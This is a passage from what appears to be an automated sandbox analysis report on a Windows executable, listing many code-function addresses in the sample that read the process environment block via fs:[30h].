          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A8243 mov eax, dword ptr fs:[00000030h]0_2_019A8243
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A8243 mov ecx, dword ptr fs:[00000030h]0_2_019A8243
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924260 mov eax, dword ptr fs:[00000030h]0_2_01924260
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924260 mov eax, dword ptr fs:[00000030h]0_2_01924260
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924260 mov eax, dword ptr fs:[00000030h]0_2_01924260
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191826B mov eax, dword ptr fs:[00000030h]0_2_0191826B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E59C mov eax, dword ptr fs:[00000030h]0_2_0195E59C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01922582 mov eax, dword ptr fs:[00000030h]0_2_01922582
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01922582 mov ecx, dword ptr fs:[00000030h]0_2_01922582
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01954588 mov eax, dword ptr fs:[00000030h]0_2_01954588
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019445B1 mov eax, dword ptr fs:[00000030h]0_2_019445B1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019445B1 mov eax, dword ptr fs:[00000030h]0_2_019445B1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A05A7 mov eax, dword ptr fs:[00000030h]0_2_019A05A7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A05A7 mov eax, dword ptr fs:[00000030h]0_2_019A05A7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A05A7 mov eax, dword ptr fs:[00000030h]0_2_019A05A7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019265D0 mov eax, dword ptr fs:[00000030h]0_2_019265D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A5D0 mov eax, dword ptr fs:[00000030h]0_2_0195A5D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A5D0 mov eax, dword ptr fs:[00000030h]0_2_0195A5D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E5CF mov eax, dword ptr fs:[00000030h]0_2_0195E5CF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E5CF mov eax, dword ptr fs:[00000030h]0_2_0195E5CF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019225E0 mov eax, dword ptr fs:[00000030h]0_2_019225E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C5ED mov eax, dword ptr fs:[00000030h]0_2_0195C5ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C5ED mov eax, dword ptr fs:[00000030h]0_2_0195C5ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6500 mov eax, dword ptr fs:[00000030h]0_2_019B6500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928550 mov eax, dword ptr fs:[00000030h]0_2_01928550
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928550 mov eax, dword ptr fs:[00000030h]0_2_01928550
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195656A mov eax, dword ptr fs:[00000030h]0_2_0195656A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195656A mov eax, dword ptr fs:[00000030h]0_2_0195656A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195656A mov eax, dword ptr fs:[00000030h]0_2_0195656A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA49A mov eax, dword ptr fs:[00000030h]0_2_019DA49A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019544B0 mov ecx, dword ptr fs:[00000030h]0_2_019544B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AA4B0 mov eax, dword ptr fs:[00000030h]0_2_019AA4B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019264AB mov eax, dword ptr fs:[00000030h]0_2_019264AB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019204E5 mov ecx, dword ptr fs:[00000030h]0_2_019204E5
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958402 mov eax, dword ptr fs:[00000030h]0_2_01958402
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958402 mov eax, dword ptr fs:[00000030h]0_2_01958402
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958402 mov eax, dword ptr fs:[00000030h]0_2_01958402
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A430 mov eax, dword ptr fs:[00000030h]0_2_0195A430
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E420 mov eax, dword ptr fs:[00000030h]0_2_0191E420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E420 mov eax, dword ptr fs:[00000030h]0_2_0191E420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E420 mov eax, dword ptr fs:[00000030h]0_2_0191E420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191C427 mov eax, dword ptr fs:[00000030h]0_2_0191C427
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA456 mov eax, dword ptr fs:[00000030h]0_2_019DA456
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191645D mov eax, dword ptr fs:[00000030h]0_2_0191645D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194245A mov eax, dword ptr fs:[00000030h]0_2_0194245A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194A470 mov eax, dword ptr fs:[00000030h]0_2_0194A470
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194A470 mov eax, dword ptr fs:[00000030h]0_2_0194A470
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194A470 mov eax, dword ptr fs:[00000030h]0_2_0194A470
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AC460 mov ecx, dword ptr fs:[00000030h]0_2_019AC460
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C678E mov eax, dword ptr fs:[00000030h]0_2_019C678E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019207AF mov eax, dword ptr fs:[00000030h]0_2_019207AF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D47A0 mov eax, dword ptr fs:[00000030h]0_2_019D47A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192C7C0 mov eax, dword ptr fs:[00000030h]0_2_0192C7C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A07C3 mov eax, dword ptr fs:[00000030h]0_2_019A07C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019247FB mov eax, dword ptr fs:[00000030h]0_2_019247FB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019247FB mov eax, dword ptr fs:[00000030h]0_2_019247FB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019427ED mov eax, dword ptr fs:[00000030h]0_2_019427ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019427ED mov eax, dword ptr fs:[00000030h]0_2_019427ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019427ED mov eax, dword ptr fs:[00000030h]0_2_019427ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE7E1 mov eax, dword ptr fs:[00000030h]0_2_019AE7E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920710 mov eax, dword ptr fs:[00000030h]0_2_01920710
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01950710 mov eax, dword ptr fs:[00000030h]0_2_01950710
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C700 mov eax, dword ptr fs:[00000030h]0_2_0195C700
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195273C mov eax, dword ptr fs:[00000030h]0_2_0195273C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195273C mov ecx, dword ptr fs:[00000030h]0_2_0195273C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195273C mov eax, dword ptr fs:[00000030h]0_2_0195273C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199C730 mov eax, dword ptr fs:[00000030h]0_2_0199C730
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C720 mov eax, dword ptr fs:[00000030h]0_2_0195C720
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C720 mov eax, dword ptr fs:[00000030h]0_2_0195C720
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920750 mov eax, dword ptr fs:[00000030h]0_2_01920750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962750 mov eax, dword ptr fs:[00000030h]0_2_01962750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962750 mov eax, dword ptr fs:[00000030h]0_2_01962750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE75D mov eax, dword ptr fs:[00000030h]0_2_019AE75D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A4755 mov eax, dword ptr fs:[00000030h]0_2_019A4755
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195674D mov esi, dword ptr fs:[00000030h]0_2_0195674D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195674D mov eax, dword ptr fs:[00000030h]0_2_0195674D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195674D mov eax, dword ptr fs:[00000030h]0_2_0195674D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928770 mov eax, dword ptr fs:[00000030h]0_2_01928770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924690 mov eax, dword ptr fs:[00000030h]0_2_01924690
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924690 mov eax, dword ptr fs:[00000030h]0_2_01924690
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019566B0 mov eax, dword ptr fs:[00000030h]0_2_019566B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C6A6 mov eax, dword ptr fs:[00000030h]0_2_0195C6A6
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0195A6C7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A6C7 mov eax, dword ptr fs:[00000030h]0_2_0195A6C7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A06F1 mov eax, dword ptr fs:[00000030h]0_2_019A06F1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A06F1 mov eax, dword ptr fs:[00000030h]0_2_019A06F1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962619 mov eax, dword ptr fs:[00000030h]0_2_01962619
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E609 mov eax, dword ptr fs:[00000030h]0_2_0199E609
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E627 mov eax, dword ptr fs:[00000030h]0_2_0193E627
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01956620 mov eax, dword ptr fs:[00000030h]0_2_01956620
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958620 mov eax, dword ptr fs:[00000030h]0_2_01958620
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192262C mov eax, dword ptr fs:[00000030h]0_2_0192262C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193C640 mov eax, dword ptr fs:[00000030h]0_2_0193C640
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01952674 mov eax, dword ptr fs:[00000030h]0_2_01952674
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E866E mov eax, dword ptr fs:[00000030h]0_2_019E866E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E866E mov eax, dword ptr fs:[00000030h]0_2_019E866E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A660 mov eax, dword ptr fs:[00000030h]0_2_0195A660
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A660 mov eax, dword ptr fs:[00000030h]0_2_0195A660
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A89B3 mov esi, dword ptr fs:[00000030h]0_2_019A89B3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A89B3 mov eax, dword ptr fs:[00000030h]0_2_019A89B3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A89B3 mov eax, dword ptr fs:[00000030h]0_2_019A89B3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A0 mov eax, dword ptr fs:[00000030h]0_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019209AD mov eax, dword ptr fs:[00000030h]0_2_019209AD
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019209AD mov eax, dword ptr fs:[00000030h]0_2_019209AD
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A9D0 mov eax, dword ptr fs:[00000030h]0_2_0192A9D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A9D0 mov eax, dword ptr fs:[00000030h]0_2_0192A9D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A9D0 mov eax, dword ptr fs:[00000030h]0_2_0192A9D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A9D0 mov eax, dword ptr fs:[00000030h]0_2_0192A9D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A9D0 mov eax, dword ptr fs:[00000030h]0_2_0192A9D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A9D0 mov eax, dword ptr fs:[00000030h]0_2_0192A9D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019549D0 mov eax, dword ptr fs:[00000030h]0_2_019549D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EA9D3 mov eax, dword ptr fs:[00000030h]0_2_019EA9D3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B69C0 mov eax, dword ptr fs:[00000030h]0_2_019B69C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019529F9 mov eax, dword ptr fs:[00000030h]0_2_019529F9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019529F9 mov eax, dword ptr fs:[00000030h]0_2_019529F9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE9E0 mov eax, dword ptr fs:[00000030h]0_2_019AE9E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AC912 mov eax, dword ptr fs:[00000030h]0_2_019AC912
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01918918 mov eax, dword ptr fs:[00000030h]0_2_01918918
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01918918 mov eax, dword ptr fs:[00000030h]0_2_01918918
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E908 mov eax, dword ptr fs:[00000030h]0_2_0199E908
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E908 mov eax, dword ptr fs:[00000030h]0_2_0199E908
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A892A mov eax, dword ptr fs:[00000030h]0_2_019A892A
